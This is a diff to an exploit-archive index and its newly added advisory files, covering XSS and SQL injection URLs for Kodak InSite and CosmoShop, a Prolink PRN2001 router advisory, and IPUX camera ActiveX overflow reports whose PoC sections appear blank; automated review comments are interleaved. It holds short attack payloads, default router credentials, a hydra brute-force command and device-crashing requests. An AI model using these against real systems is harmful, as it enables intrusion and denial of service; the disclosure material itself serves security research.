diff --git a/files.csv b/files.csv
index e25fee073..0d39b466b 100755
--- a/files.csv
+++ b/files.csv
@@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
-31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
+31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port
33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
-33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
+33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80
33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
@@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port
34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
-34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80
+34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80
34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
@@ -31736,7 +31736,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
-35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0
+35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
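Review bot: The retitled 35234 row drops the root cause: `"OSSEC 2.8 - Privilege Escalation"` no longer says the issue is insecure temporary file creation, which is the term someone triaging or searching the index by weakness class would look for. The old wording was clumsy ("Vulnerability Privilege Escalation"), but the cleanup can keep the cause, for example `"OSSEC 2.8 - Insecure Temporary File Creation Privilege Escalation"`.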
@@ -31892,3 +31892,23 @@ id,file,description,date,author,platform,type,port
35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
+35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0
+35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0
+35413,platforms/php/webapps/35413.php,"WordPress <=4.0 Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80
+35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
+35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
+35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 'basicstats.php' Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
+35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0
+35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 'do' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0
+35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
+35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
+35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
+35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0
+35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0
+35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
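Review bot: Rows 35420, 35421 and 35422 are filed as `hardware,webapps`, but their titles describe a stack buffer overflow in a client-side ActiveX control (`.ocx`), and the advisory text added in this commit says it was tested on Windows 7. Anyone filtering the index by the `windows` platform to assess workstation exposure will miss them. Consider reclassifying them, which would also mean moving the files, since the path column repeats the platform and type; the right target is a guess from here because only part of the index is visible. Separately, rows 35413 and 35414 spell the product `WordPress` and `Wordpress` and use different title formats (`<=4.0 Denial of Service Exploit` against `< 4.0.1 - Denial of Service`), which makes the two related entries harder to find together.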
diff --git a/platforms/asp/webapps/35411.txt b/platforms/asp/webapps/35411.txt
new file mode 100755
index 000000000..8b86b5bbc
--- /dev/null
+++ b/platforms/asp/webapps/35411.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46762/info
+
+Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kodak InSite 5.5.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Troubleshooting/DiagnosticReport.asp?HeaderWarning=&Language=en&rflp=true#
\ No newline at end of file
diff --git a/platforms/asp/webapps/35412.txt b/platforms/asp/webapps/35412.txt
new file mode 100755
index 000000000..676282913
--- /dev/null
+++ b/platforms/asp/webapps/35412.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46762/info
+
+Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kodak InSite 5.5.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Pages/login.aspx?SessionTimeout=False&Language=de%26rflp=True','00000000-0000-0000-0000-000000000000'); alert('XSS!'); return false; a('
\ No newline at end of file
diff --git a/platforms/cgi/webapps/35438.txt b/platforms/cgi/webapps/35438.txt
new file mode 100755
index 000000000..b33c20fd7
--- /dev/null
+++ b/platforms/cgi/webapps/35438.txt
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/46828/info
+
+CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CosmoShop ePRO V10.05.00 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/admin/index.cgi?action=menu&id=eco'+SQL_CODE&hId=eco
+
+
+
+
+http://www.example.com/cgi-bin/admin/rubrikadmin.cgi?action=edit&rubnum=angebote&rcopy=">&expand=,angebote
+
+http://www.example.com/cgi-bin/admin/artikeladmin.cgi?action=artikelsuche&typ=bearbeiten">&hId=daten.artikel
+
+http://www.example.com/cgi-bin/admin/shophilfe_suche.cgi?sprache=de&suchbegriff=1">
+
+
+
+
\ No newline at end of file
diff --git a/platforms/hardware/webapps/35419.txt b/platforms/hardware/webapps/35419.txt
new file mode 100755
index 000000000..0ed66ac22
--- /dev/null
+++ b/platforms/hardware/webapps/35419.txt
@@ -0,0 +1,273 @@
+Exploit Title: Prolink PRN2001 Multiple Vulnerabilities
+
+1. -Advisory Information-
+
+Title: Prolink PRN2001 Multiple Vulnerabilities
+Firmware: Ver 1.2
+Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip
+Vendor Homepage: http://www.prolink2u.com/
+Author: Herman Groeneveld aka sh4d0wman
+Tested On: Windows 7 / Kali
+Date published: Dec 01 2014
+Release mode: Coordinated release
+
+2. -Vulnerability Information-
+
+PROLiNK® PRN2001 Wireless- N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater.
+
+Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are: admin/password
+
+In the default configuration all vulnerabilities are restricted to exploitation over the LAN/WLAN interfaces. A successful compromise would give an attacker full control over the device. This would enable an attacker to enable remote device management over the WAN interface.
+
+
+3. - Technical Description / Proof of Concept Code -
+
+Introduction:
+
+The following type of vulnerabilities have been discovered in the device:
+- 3.1: CWE-286: Incorrect User Management
+- 3.2: CWE-668: Exposure of Resource to Wrong Sphere
+- 3.3: CWE-200: Information Exposure
+- 3.4: CWE- 80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
+- 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service
+- 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration
+
+
+Technical Description:
+--------------------------------------------------------------
+
+3.1 -Class: CWE-286: Incorrect User Management-
+
+Description: insufficient separation of privileges. Any account with user-level privileges has the following privileges in the web-management interface:
+- Create new users with administrative privileges
+- Upgrade the device firmware
+- Download and upload configuration files
+
+PoC: users could escalate their privileges by creating a new account.
+
+--------------------------------------------------------------
+
+3.2 -CWE-668: Exposure of Resource to Wrong Sphere-
+
+Description: a user-level account is not restricted from exporting or importing a device configuration file. The configuration file "config.img" is stored as plain-text XML. This is the root cause for the following vulnerabilities:
+
+---------------------------------------------------------------
+
+Name: privilege escalation through device configuration file
+
+Description: the plaintext XML configuration file leaks the administrative user and password of the device giving an attacker full control over the device.
+
+PoC: administrative accounts have Flag value 0x0:
+
+
+
+
+
+
+
+---------------------------------------------------------------
+
+Name: telnet privilege escalation through device configuration file
+
+Description: in the plaintext XML configuration file any administrative user account is set to: . When this value is changed to the account gains the following additional command options in a telnet shell:
+
+- chksum: Check sum checking. Syntax: chksum address length
+- dhcp: Enable DHCP client
+- disable: Turn off privileged commands
+- enable: Turn on privileged commands
+- loaddll: Unknown functionality / DoS: issuing loaddll crashes the device
+- script: Run specified script
+- system: Show general system information
+- webdll: Unknown functionality
+- xfile: File copy functionality
+- xip: Resolve dns
+
+--------------------------------------------------------------
+
+3.3 -CWE-200: Information Exposure-
+
+Description: the device is leaking various kinds of sensitive information which can aid the attacker in vulnerability discovery and/or escalate privileges.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: configuration-file sensitive information disclosure
+
+Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plain-text. The following sensitive information is leaked:
+
+Confidentiality Related:
+- Plaintext administrative credentials
+- Plaintext user-level credentials
+- Plaintext PPoE WAN credentials
+- Plaintext WEP key | WPA PSK | WSC Pin
+
+Device Integrity Related:
+- Create, Modify or Delete accounts:
+PoC: change anything inside the chain or delete the complete chain:
+
+
+
+
+
+
+
+- Enabling Device Management over WAN:
+PoC: modify NATRULE_INSRC_STATIC to allow web and or telnet device management over the WAN port.
+
+- DNS traffic redirection:
+PoC: modify DHCP Assigned DNS settings to point clients to a rogue DNS server.
+
+--------------------------------------------------------------
+
+Name: log-file sensitive information disclosure
+
+Description: logging is disabled by default. When it is enabled any valid user-level or administrative accounts can view this log through the web-management interface. Invalid logon attempts show the username and invalid passwords in plaintext. If a user does misspell his password an attacker has a high chance of guessing the correct password.
+
+Data Exposed:
+- Usernames
+- Passwords (partial)
+
+--------------------------------------------------------------
+
+Name: telnet sensitive information disclosure
+
+Description: the telnet command "show web" lists the complete web structure which can aid an attacker in vulnerability discovery.
+
+PoC: the following URL's are leaked and not available through the default web-management interface:
+- dhcpvendortbl_withoutcheck.htm
+- debug.htm
+
+--------------------------------------------------------------
+
+
+3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)-
+
+Description: the web-based device management interface is vulnerable to persistent XSS attacks caused by insufficient input validation. A valid account on the router is needed to exploit the vulnerabilities.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+URL: ddns.htm
+Field(s): hostname, username
+PoC: insert into both fields:
+
+XSS Execution:
+- When the dyndns settings page is requested in the web-interface
+- if logging is enabled: loading the system log in the web-interface
+
+--------------------------------------------------------------
+
+URL: login.htm
+Fields: username
+PoC: insert as username:
+
+XSS Execution:
+- if logging is enabled: loading the system log in the web-interface
+
+--------------------------------------------------------------
+
+URL: config.img
+Field(s): any of the above values but modified through the configuration file (XML).
+
+Description: the configuration file is stored in plain-text. Above injection can be carried out by inserting the XSS test-string into XML elements. Execution takes place inside the web-management interface when browsed to the vulnerable url's.
+
+XSS Execution:
+- same locations as previous disclosed injections but in XML, username injection example:
+
+
+
+
+--------------------------------------------------------------
+
+
+3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service-
+
+Description: un-authenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In this process all LAN, WAN and Wireless connections are dropped.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: Unauthenticated device DoS
+
+Description: sending a request to [device ip]/autboot.htm in the web-management interface will initiate a factory-default reboot. In this process all LAN, WAN and Wireless connections are dropped. Device settings however remain unchanged.
+
+PoC: GET request to [deviceip]/autoboot.htm
+
+--------------------------------------------------------------
+
+Name: Authenticated device DoS through invalid firmware update
+
+Description: authenticated users could crash the device by uploading a large file as firmware upgrade. The device has no checks in place before the upload is accepted. After a certain amount of data is uploaded the device will initiate a reboot, most likely to resource exhaustion of either the memory or local disk space.
+
+PoC: upload any big file as firmware image
+
+--------------------------------------------------------------
+
+Name: Authenticated Telnet custom command device DoS
+
+Description: various custom telnet commands can be unlocked through the configuration file. Executing the "loaddll" command without any parameters will crash and reboot the device.
+
+PoC: gain special privileges and issue the loaddll inside the telnet shell
+
+--------------------------------------------------------------
+
+Name: Authenticated NTP Date HTTP Request device DoS
+
+Description: the web-management interface allows time configuration by authenticated users. If certain parts are modified the device will crash and reboot.
+
+PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send
+Insert junk (for example: A*400) in Year, Month or Day and the device will crash.
+
+--------------------------------------------------------------
+
+
+3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration-
+
+Description: various configuration settings do not conform to general recommended security best practices weakening the device's security posture.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: configuration error
+
+Description: when new user accounts are created through the web-management interface the default permissions are root-level and these can't be changed to user-level. However intercepting the HTTP request and modifying the permissions parameter to user-level results in the creation of a user account with user-level privileges. Parts of the web management interface will be restricted.
+
+PoC: enter a valid name and password, change the privilege level to 1 (root priv) or 2 (user priv):
+username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=$submit.htm%Fuserconfig.htm=Send
+
+--------------------------------------------------------------
+
+Name: unencrypted device management protocols
+
+Description: the router can be managed either through the web-management interface which sends HTTP traffic or by Telnet. Both protocols use plaintext communications which could allow an attacker to intercept and/or modify this traffic.
+
+--------------------------------------------------------------
+
+Name: password complexity and lockout policy
+
+Description: no password complexity is enforced, the minimum length is 1 character. No lockout mechanism does exist for the web-management interface. This enables an attacker to guess a correct username / password combination through password guessing or brute-forcing. Weak passwords give an attacker a higher chance of success.
+The telnet service features a lockout policy; it disconnects any client after three wrong login attempts.
+
+PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error'
+
+--------------------------------------------------------------
+
+4. -Vendor Information, Solutions and Workarounds-
+Date 10-10-2014 - Vulnerabilities discovered
+Date 20-10-2014 - Contacted vendor by e-mail for responsble disclosure, informed them of release date December 1st 2014
+ No Reply
+Date 01-11-2014 - Contacted vendor by e-mail
+ No Reply
+Date 15-11-2014 - Contacted vendor by e-mail
+ No Reply
+Date 01-12-2014 - Public Disclosure
+
+5. -Author-
+This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman
+I am a freelance security consultant / researcher based in Phnom Penh
+Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-)
+herman_worldwide [at] hotmail [.co]m
\ No newline at end of file
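Review bot: Section 4 is titled "Vendor Information, Solutions and Workarounds" but holds only the disclosure timeline, so a reader gets no mitigation even though the advisory's own findings imply several. A short addition would close that gap, for example `Workarounds: change the default admin/password credentials; keep WAN-side management disabled; treat every user-level account as administrative when deciding who gets one`. The text also disagrees with itself in places a defender would rely on. The unauthenticated-reboot page is spelled `autboot.htm` in the description and `autoboot.htm` in the PoC line, and the add-user request uses `submit.htm%F` where the other requests use `submit.htm%3F`. As rendered here, the sentence "any administrative user account is set to: . When this value is changed to the account gains" has lost both values, so someone auditing an exported `config.img` cannot tell which setting to check.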
diff --git a/platforms/hardware/webapps/35420.txt b/platforms/hardware/webapps/35420.txt
new file mode 100755
index 000000000..edd0fc7cb
--- /dev/null
+++ b/platforms/hardware/webapps/35420.txt
@@ -0,0 +1,273 @@
+?
+IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
+
+Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
+Motion JPEG video compression, the file size of video stream is extremely reduced,
+as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
+a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
+illuminators for both day and night applications.
+
+Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraMJCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(48d0.2e98): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx -
+eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
+eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+ntdll!RtlDeleteCriticalSection+0x77:
+7796466c 833800 cmp dword ptr [eax],0 ds:002b:41414149=????????
+
+----------------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5214
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription UltraMJCam ActiveX Control
+FileVersion 1, 0, 52, 23
+InternalName UltraMJCamX
+OriginalFileName UltraMJCamX.ocx
+ProductName UltraMJCam device ActiveX Control
+ProductVersion 1, 0, 52, 23
+
+
+List of members:
+----------------
+
+Interface IUltraMJCamX : IDispatch
+Default Interface: True
+Members : 65
+ RemoteHost
+ RemotePort
+ AccountCode
+ GetConfigValue
+ SetConfigValue
+ SetCGIAPNAME
+ Password
+ UserName
+ fChgImageSize
+ ImgWidth
+ ImgHeight
+ SnapFileName
+ AVIRecStart
+ SetImgScale
+ OpenFolder
+ OpenFileDlg
+ TriggerStatus
+ AVIRecStatus
+ Event_Frame
+ PlayVideo
+ SetAutoScale
+ Event_Signal
+ WavPlay
+ CGI_ParamGet
+ CGI_ParamSet
+ MulticastEnable
+ MulticastStatus
+ SetPTUserAllow
+ SetLanguage
+ TimestampEnable
+ TimestampStroke
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SetCGIAPNAME
+Password
+Username
+SnapFileName
+OpenFolder
+CGI_ParamGet
+CGI_ParamSet
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+
+
+
+
+
+
+---2
+
+
+
+
+
+
+
+
+---3
+
+
+
+
+
+
+
+
+---4
+
+
+
+
+
+
+
+
+---5
+
+
+
+
+
+
+
+
+---6
+
+
+
+
+
+
+
+
+---7
+
+
+
+
+
+
+
+
+---8
+
+
+
+
+
+
+
+
+---9
+
+
+
+
+
+
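Review bot: The advisory ends at the crash trace and member lists with no mitigation or detection guidance, and 35421.txt has the same gap. The trace already shows the control loaded from `C:\Windows\Downloaded Program Files\UltraMJCamX.ocx`, so one added line such as `Detection: inventory Windows hosts for UltraMJCamX.ocx under C:\Windows\Downloaded Program Files and remove or disable the control where the camera UI is not needed` would give defenders something actionable. The file also opens with a lone `?` line, which looks like a mangled byte-order mark and should be dropped. Finally, the vulnerable-members list spells `Username` where the member list has `UserName`; use one spelling so the entry can be matched against the control's interface.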
diff --git a/platforms/hardware/webapps/35421.txt b/platforms/hardware/webapps/35421.txt
new file mode 100755
index 000000000..c3d157ec8
--- /dev/null
+++ b/platforms/hardware/webapps/35421.txt
@@ -0,0 +1,175 @@
+IPUX CL5452/CL5132 IP Camera (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: Bullet Type ICL5132 (firmware: ICL5132 2.0.0-2 20130730 r1112)
+ Bullet Type ICL5452
+
+Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
+With high performance H.264 video compression, the file size of video stream is
+extremely reduced, as to optimize the network bandwidth efficiency. It has full
+Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
+built-in USB port provides a convenient and portable storage option for local storage
+of event and schedule recording, especially network disconnected.
+
+Desc: The UltraSVCam ActiveX Control 'UltraSVCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraSVCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(3ef0.3e0c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraSVCamX.ocx -
+eax=41414149 ebx=00000001 ecx=00003e0c edx=02163f74 esi=41414141 edi=02163f74
+eip=77e8466c esp=003eef8c ebp=003eefc0 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+ntdll!RtlDeleteCriticalSection+0x77:
+77e8466c 833800 cmp dword ptr [eax],0 ds:002b:41414149=????????
+
+----------------------------------------------------------------------------------
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5213
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5213.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription UltraSVCam ActiveX Control
+FileVersion 1, 0, 53, 34 and 1, 0, 53, 33
+InternalName UltraSVCamX
+OriginalFileName UltraSVCamX.ocx
+ProductName UltraSVCam device ActiveX Control
+ProductVersion 1, 0, 53, 34 and 1, 0, 53, 33
+
+
+List of members:
+----------------
+
+Interface IUltraSVCamX : IDispatch
+Default Interface: True
+Members : 51
+ RemoteHost
+ RemotePort
+ AccountCode
+ Password
+ UserName
+ fChgImageSize
+ ImgWidth
+ ImgHeight
+ SnapFileName
+ AVIRecStart
+ SetImgScale
+ OpenFolder
+ OpenFileDlg
+ TriggerStatus
+ AVIRecStatus
+ PlayVideo
+ SetAutoScale
+ SetPTUserAllow
+ SetLanguage
+ SetFullScreen
+ SetZoom
+ SetDirectShow
+ SetROIParam
+ FOpen
+ FSeek
+ FDeleteFile
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SnapFileName
+OpenFolder
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+
+
+
+
+
+
+---2
+
+
+
+
+
+
+
+
+---3
+
+
+
+
+
+
+
+
+---4
+
+
+
+
+
+
